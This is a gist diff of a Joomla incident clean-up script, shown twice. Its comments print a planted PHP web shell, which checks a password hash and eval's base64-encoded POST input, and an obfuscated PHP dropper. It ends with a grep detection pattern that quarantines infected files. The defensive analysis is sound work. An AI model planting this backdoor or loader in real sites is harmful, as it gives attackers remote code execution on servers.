appsol · February 26, 2015 09:35
diff --git a/gistfile1.sh b/gistfile1.sh
 # The hack places the following file in administrator/components/com_joomlaupdate/config.php:
 # 
 # <?php 
 # echo"trest";error_reporting(0);
 # if(isset($_POST['com']) && md5($_POST['com']) == '66d18dc9cbd1b87d4460a2ce37d8e835' && isset($_POST['content'])) $kk = strtr($_POST['content'], '-_,', '+/=');eval(base64_decode($kk));
 # echo"abrval";
 # ?>
 #
 # This creates many files of a similar pattern throughout the Joomla install, e.g.
 # 
 #<?php
 #$EPBAuEz='kAR0SJj'^tuVMICG2;$gyIRi='<_j'|'4_I';$hSij='K^]S_{'.___ZI_.'~k}U_3'&/*HGBiTX5'.
 #         '?<omz(b#L*/"ov}U_{_}"._RM_t____."}";$EUiJC3='#'.p5Vg.'('.foFa.'*p>0K,50'^/*Nl'.
 #         'Yh8mg*/"{%C&8p9!)6W/`M&CjC";$kzDhU4Asu=eHhw."<i|q"^'W+YG^_KA';$dBywBcXMj='SS8'.
 #         '[;6'^'46L4U@';$_vKFCCB4xDo='k{'.oqte_vwnowmoo&gzoyuo_fu.'~'.wwmoo;$VtR11P='a?'.
 #         'd.'^')k0~';$HfH=J|U;$lhAjEPd0b=A&'}';$fuV8Y8nvBAc='6[tOQ|q=_Az]%'.loicOB.'+r4'.
 #         'C#'^'T:'.ExiKAYkpJjC.']]]Vz '.OGUsB;$xYX5Cp1sQ_=('SBC$2K'|'LZD  B')^(#DKcV_y0'.
 #         'ewV!rk'^IYcf.'-P');$wfgvd1K2O=$gyIRi^('Y{_'&'u?~');$bhAAnwVPm=$dBywBcXMj&('/I'.
 #         '?%6-'^'X&APH[');$niPNTbW9tt=('qgf|l&'.syuw_RlK&gAtoW.'}'.uaxVF.']lS')|(#Vhe28'.
 #         '14'.YF5u.'%4D +UR|'^SUqbj.' Fqv{M`4]');$y3Lhyph=('c2`'.ADG_1.'}'.oZTCg.'^'|#q'.
 #         '2@ei}`'.PW5m.'#'.pjir)&$_vKFCCB4xDo;$NiOqLK7=$hSij&$EUiJC3;if(!$xYX5Cp1sQ_(/*'.
 #         'p*/$wfgvd1K2O($bhAAnwVPm($VtR11P.$HfH.$lhAjEPd0b)),$kzDhU4Asu.$fuV8Y8nvBAc))/*'.
 #         '1Hbpfdc*/$niPNTbW9tt($y3Lhyph(false,$bhAAnwVPm($NiOqLK7)));#T[gl+<ZBOcaZeN}H'.
 #         'h_ MG0H8o>Lwat9cN_zKE7v2af=m^$TG #Vs(4_ygDM+=zK1x1br&wYx|';
 #
 # This is obviously some type of base64 encoded and generally obfuscated payload designed for execution later.
 # I believe it may be to send out spam from your servers SMTP.
 #
 # To clean these out run the following from the directory below the Joomla install.
 # If your Joomla directory is not public_html you will need to rename public_html to the name of your Joomla install directory
 # The script will take all the files it finds that match the pattern and deposit them in the directory bad/
 #
 # Hope this helps. Stuart.
 #
 grep -l -r -Z -E "^\\\$[A-Za-z]+='.{77}'\.$" public_html | xargs -0 -I{} mv {} bad/
	# The hack places the following file in administrator/components/com_joomlaupdate/config.php:
	#
	# <?php
	# echo"trest";error_reporting(0);
	# if(isset($_POST['com']) && md5($_POST['com']) == '66d18dc9cbd1b87d4460a2ce37d8e835' && isset($_POST['content'])) $kk = strtr($_POST['content'], '-_,', '+/=');eval(base64_decode($kk));
	# echo"abrval";
	# ?>
	#
	# This creates many files of a similar pattern throughout the Joomla install, e.g.
	#
	#<?php
	#$EPBAuEz='kAR0SJj'^tuVMICG2;$gyIRi='<_j'\|'4_I';$hSij='K^]S_{'.___ZI_.'~k}U_3'&/*HGBiTX5'.
	# '?<omz(b#L/"ov}U_{_}"._RM_t____."}";$EUiJC3='#'.p5Vg.'('.foFa.'p>0K,50'^/*Nl'.
	# 'Yh8mg*/"{%C&8p9!)6W/`M&CjC";$kzDhU4Asu=eHhw."<i\|q"^'W+YG^_KA';$dBywBcXMj='SS8'.
	# '[;6'^'46L4U@';$_vKFCCB4xDo='k{'.oqte_vwnowmoo&gzoyuo_fu.'~'.wwmoo;$VtR11P='a?'.
	# 'd.'^')k0~';$HfH=J\|U;$lhAjEPd0b=A&'}';$fuV8Y8nvBAc='6[tOQ\|q=_Az]%'.loicOB.'+r4'.
	# 'C#'^'T:'.ExiKAYkpJjC.']]]Vz '.OGUsB;$xYX5Cp1sQ_=('SBC$2K'\|'LZD B')^(#DKcV_y0'.
	# 'ewV!rk'^IYcf.'-P');$wfgvd1K2O=$gyIRi^('Y{_'&'u?~');$bhAAnwVPm=$dBywBcXMj&('/I'.
	# '?%6-'^'X&APH[');$niPNTbW9tt=('qgf\|l&'.syuw_RlK&gAtoW.'}'.uaxVF.']lS')\|(#Vhe28'.
	# '14'.YF5u.'%4D +UR\|'^SUqbj.' Fqv{M`4]');$y3Lhyph=('c2`'.ADG_1.'}'.oZTCg.'^'\|#q'.
	# '2@ei}`'.PW5m.'#'.pjir)&$_vKFCCB4xDo;$NiOqLK7=$hSij&$EUiJC3;if(!$xYX5Cp1sQ_(/*'.
	# 'p/$wfgvd1K2O($bhAAnwVPm($VtR11P.$HfH.$lhAjEPd0b)),$kzDhU4Asu.$fuV8Y8nvBAc))/'.
	# '1Hbpfdc*/$niPNTbW9tt($y3Lhyph(false,$bhAAnwVPm($NiOqLK7)));#T[gl+<ZBOcaZeN}H'.
	# 'h_ MG0H8o>Lwat9cN_zKE7v2af=m^$TG #Vs(4_ygDM+=zK1x1br&wYx\|';
	#
	# This is obviously some type of base64 encoded and generally obfuscated payload designed for execution later.
	# I believe it may be to send out spam from your servers SMTP.
	#
	# To clean these out run the following from the directory below the Joomla install.
	# If your Joomla directory is not public_html you will need to rename public_html to the name of your Joomla install directory
	# The script will take all the files it finds that match the pattern and deposit them in the directory bad/
	#
	# Hope this helps. Stuart.
	#
	grep -l -r -Z -E "^\\\$[A-Za-z]+='.{77}'\.$" public_html \| xargs -0 -I{} mv {} bad/